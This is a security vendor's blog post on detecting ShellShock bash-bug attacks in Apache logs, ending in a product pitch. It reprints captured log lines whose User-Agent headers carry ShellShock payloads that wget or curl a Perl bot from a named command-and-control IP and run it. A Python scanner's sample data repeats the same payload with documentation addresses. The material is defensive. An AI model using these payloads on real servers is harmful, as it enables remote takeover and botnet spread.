Protect your server from ShellShock attacks with BitNinja

Many servers are still affected by the ShellShock vulnerability, which gives attackers a remote exploit opportunity.

What does it mean?

If your server hasn’t been patched against the recently discovered ShellShock bash bug, attackers can easily gain root access to it through a specially crafted HTTP request. Recently, whole botnets have been expanding by exploiting this vulnerability. The best defense against ShellShock attacks is updating bash so that the bug is patched. In addition, our team's research has found that so far an average of 9 out of 10 ShellShock attacks have been blocked by BitNinja even without a dedicated ShellShock filter. Development of BitNinja’s log-analyzing module (SenseLog) is in full swing, so we can provide immediate defense against ShellShock attacks by analyzing log files.

Have you perceived ShellShock attempts lately?

You can easily check by issuing this command:

grep -F '() { :;};' /var/log/apache2/access.log

(assuming the Apache web server's default log location; -F searches for the literal string, so the parentheses and braces are not treated as pattern characters)

Here is an example from one of our web servers: a botnet trying to exploit the ShellShock vulnerability from several different IP addresses.

***.hu 174.127.72.77 - - [25/Nov/2014:17:55:43 +0100] "GET /cgi-bin/sys.cgi HTTP/1.0" 404 292 "-" "() { :;}; /bin/bash -c "cd /var/tmp ; wget http://88.150.140.66/ig.exe ; curl -O http://88.150.140.66/ig.exe ; perl ig.exe ; rm -rf /var/tmp/ig.exe;rm -rf ig.exe*""
***.hu 85.25.26.251 - - [27/Nov/2014:14:59:06 +0100] "GET /cgi-bin/sip.cgi HTTP/1.0" 404 292 "-" "() { :;}; /bin/bash -c "cd /var/tmp ; wget http://88.150.140.66/mid ; curl -O http://88.150.140.66/mid;perl mid;rm -rf mid""
***.hu 85.25.26.251 - - [27/Nov/2014:15:12:34 +0100] "GET /cgi-bin/sip.cgi HTTP/1.0" 301 336 "-" "() { :;}; /bin/bash -c "cd /var/tmp ; wget http://88.150.140.66/mid ; curl -O http://88.150.140.66/mid;perl mid;rm -rf mid""
***.com 85.25.26.251 - - [27/Nov/2014:15:14:34 +0100] "GET /cgi-bin/sip.cgi HTTP/1.0" 404 294 "-" "() { :;}; /bin/bash -c "cd /var/tmp ; wget http://88.150.140.66/mid ; curl -O http://88.150.140.66/mid;perl mid;rm -rf mid""
***.hu 85.25.26.251 - - [27/Nov/2014:15:16:35 +0100] "GET /cgi-bin/sip.cgi HTTP/1.0" 404 294 "-" "() { :;}; /bin/bash -c "cd /var/tmp ; wget http://88.150.140.66/mid ; curl -O http://88.150.140.66/mid;perl mid;rm -rf mid""
***.hu 85.25.26.251 - - [27/Nov/2014:15:17:24 +0100] "GET /cgi-bin/sip.cgi HTTP/1.0" 404 291 "-" "() { :;}; /bin/bash -c "cd /var/tmp ; wget http://88.150.140.66/mid ; curl -O http://88.150.140.66/mid;perl mid;rm -rf mid""
***.hu 89.19.10.178 - - [27/Nov/2014:18:22:18 +0100] "GET /cgi-bin/sys.cgi HTTP/1.0" 404 296 "-" "() { :;}; /bin/bash -c "cd /var/tmp ; wget http://88.150.140.66/mid ; curl -O http://88.150.140.66/mid;perl mid;rm -rf mid""
***.com 87.119.221.6 - - [27/Nov/2014:21:42:13 +0100] "GET /cgi-bin/admin.cgi HTTP/1.0" 404 303 "-" "() { :;}; /bin/bash -c "cd /var/tmp ; wget http://88.150.140.66/mid ; curl -O http://88.150.140.66/mid;perl mid;rm -rf mid""
***.hu 92.242.4.130 - - [01/Dec/2014:06:05:30 +0100] "GET /cgi-bin/bin.cgi HTTP/1.0" 404 298 "-" "() { :;}; /bin/bash -c "cd /var/tmp ; wget http://88.150.140.66/midx ; curl -O http://88.150.140.66/midx;perl midx;rm -rf midx*""
***.hu 92.242.4.130 - - [01/Dec/2014:06:05:33 +0100] "GET /cgi-bin/bin.cgi HTTP/1.0" 404 292 "-" "() { :;}; /bin/bash -c "cd /var/tmp ; wget http://88.150.140.66/midx ; curl -O http://88.150.140.66/midx;perl midx;rm -rf midx*""
***.hu 92.242.4.130 - - [01/Dec/2014:06:06:12 +0100] "GET /cgi-bin/bin.cgi HTTP/1.0" 404 297 "-" "() { :;}; /bin/bash -c "cd /var/tmp ; wget http://88.150.140.66/midx ; curl -O http://88.150.140.66/midx;perl midx;rm -rf midx*""

What do they have in common?

The 88.150.140.66 C&C (Command and Control) server. This server controls the botnet, and it is also where the infectious Perl bot file is downloaded from. http://88.150.140.66/mid is the botnet program, written in Perl.
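The grep check above finds only the exact string `() { :;};`, and the "what do they have in common" question is answered by reading the payloads by hand. The following is an added example, not BitNinja code and not part of the original post: it parses Apache combined-format log lines (with the optional leading vhost seen in the sample above), flags any request whose quoted fields carry the ShellShock function-definition prefix `() {` regardless of spacing, and tallies the source IPs, the probed CGI paths and the hosts the payloads try to download from, so the shared C&C stands out automatically. The sample log lines are constructed with RFC 5737 documentation addresses and mimic the post's format; they are not real traffic.

```python
"""Scan Apache access-log lines for ShellShock probes and summarise them.

Added example (not BitNinja's code). The SAMPLE_LOG lines are constructed
for this example using documentation IP ranges (192.0.2.x, 203.0.113.x).
"""
import re
from collections import Counter
from urllib.parse import urlparse

# ShellShock payloads start with a bash function definition "() {".
# Attack tools vary the spacing, so match the shape rather than one literal.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{")

# Combined log format, optionally prefixed by a vhost (as in the post's sample):
#   [vhost] client ident user [time] "request" status bytes "referer" "user-agent"
# The User-Agent may contain unescaped quotes in these logs, so it is matched
# greedily up to the final quote; the Referer is matched non-greedily.
LOG_RE = re.compile(
    r'^(?:(?P<vhost>\S+)\s+)?(?P<ip>\d{1,3}(?:\.\d{1,3}){3})\s+\S+\s+\S+\s+'
    r'\[(?P<time>[^\]]+)\]\s+"(?P<request>[^"]*)"\s+(?P<status>\d{3})\s+(?P<size>\S+)\s+'
    r'"(?P<referer>.*?)"\s+"(?P<agent>.*)"$'
)

# URLs inside a payload; stop at whitespace, ';' or quotes that end a command.
URL_RE = re.compile(r"https?://[^\s;'\"]+")

# Constructed sample: one benign hit, two probes via User-Agent, one via Referer.
SAMPLE_LOG = [
    'example.test 192.0.2.10 - - [25/Nov/2014:17:50:01 +0100] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    'example.test 192.0.2.20 - - [25/Nov/2014:17:55:43 +0100] "GET /cgi-bin/sys.cgi HTTP/1.0" 404 292 "-" '
    '"() { :;}; /bin/bash -c "cd /var/tmp ; wget http://203.0.113.5/mid ; curl -O http://203.0.113.5/mid;perl mid;rm -rf mid""',
    'example.test 192.0.2.21 - - [27/Nov/2014:14:59:06 +0100] "GET /cgi-bin/sip.cgi HTTP/1.0" 404 292 "-" '
    '"() { :;}; /bin/bash -c "cd /var/tmp ; wget http://203.0.113.5/mid ; curl -O http://203.0.113.5/mid;perl mid;rm -rf mid""',
    'example.test 192.0.2.21 - - [27/Nov/2014:15:12:34 +0100] "GET /cgi-bin/admin.cgi HTTP/1.0" 404 303 '
    '"() {:;}; /bin/bash -c "wget http://203.0.113.5/midx"" "curl/7.38.0"',
]


def parse_line(line):
    """Return the named fields of one log line, or None if it does not parse."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def is_shellshock(entry):
    """True if any field the web server exports into the CGI environment carries the prefix."""
    return any(SHELLSHOCK_RE.search(entry[field]) for field in ("request", "referer", "agent"))


def payload_hosts(entry):
    """Hosts the injected command tries to fetch from (the likely C&C / staging server)."""
    hosts = set()
    for field in ("referer", "agent"):
        for url in URL_RE.findall(entry[field]):
            host = urlparse(url).hostname
            if host:
                hosts.add(host)
    return hosts


def scan(lines):
    """Aggregate ShellShock probes by source IP, probed path and payload host."""
    summary = {
        "total": 0, "unparsed": 0, "shellshock": 0,
        "sources": Counter(), "paths": Counter(), "payload_hosts": Counter(),
    }
    for line in lines:
        summary["total"] += 1
        entry = parse_line(line)
        if entry is None:
            summary["unparsed"] += 1
            continue
        if not is_shellshock(entry):
            continue
        summary["shellshock"] += 1
        summary["sources"][entry["ip"]] += 1
        parts = entry["request"].split()
        summary["paths"][parts[1] if len(parts) > 1 else entry["request"]] += 1
        for host in payload_hosts(entry):
            summary["payload_hosts"][host] += 1
    return summary


def common_cnc(summary):
    """The host most payloads download from, i.e. the botnet's common C&C, or None."""
    top = summary["payload_hosts"].most_common(1)
    return top[0][0] if top else None


if __name__ == "__main__":
    import sys
    lines = open(sys.argv[1], errors="replace") if len(sys.argv) > 1 else SAMPLE_LOG
    result = scan(lines)
    print(f"{result['shellshock']} ShellShock probes in {result['total']} lines "
          f"({result['unparsed']} unparsed)")
    print("sources:", dict(result["sources"]))
    print("paths:", dict(result["paths"]))
    print("payload hosts:", dict(result["payload_hosts"]), "-> common C&C:", common_cnc(result))
```

Run it as `python3 shellshock_scan.py /var/log/apache2/access.log` to scan a real log, or with no argument to run over the constructed sample. Unlike the literal grep, the `() {` pattern also catches payloads placed in the Referer or with different spacing, which matters because the web server exports several headers into the CGI process environment, not just the User-Agent.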

What is it for?

• waiting for commands over IRC

• running arbitrary shell commands

• TCP flood

• UDP flood

• sending arbitrary HTTP requests (to spread the infection further)

Protect your server from similar attacks!

Install BitNinja

Setting up takes just 3 simple steps:

• Fill in the registration form to sign up

• Activate your account via the confirmation mail

• Install BitNinja on your server in 5 minutes with your favorite package manager (yum, apt-get)

That’s it! It only takes a few minutes and your servers are safe!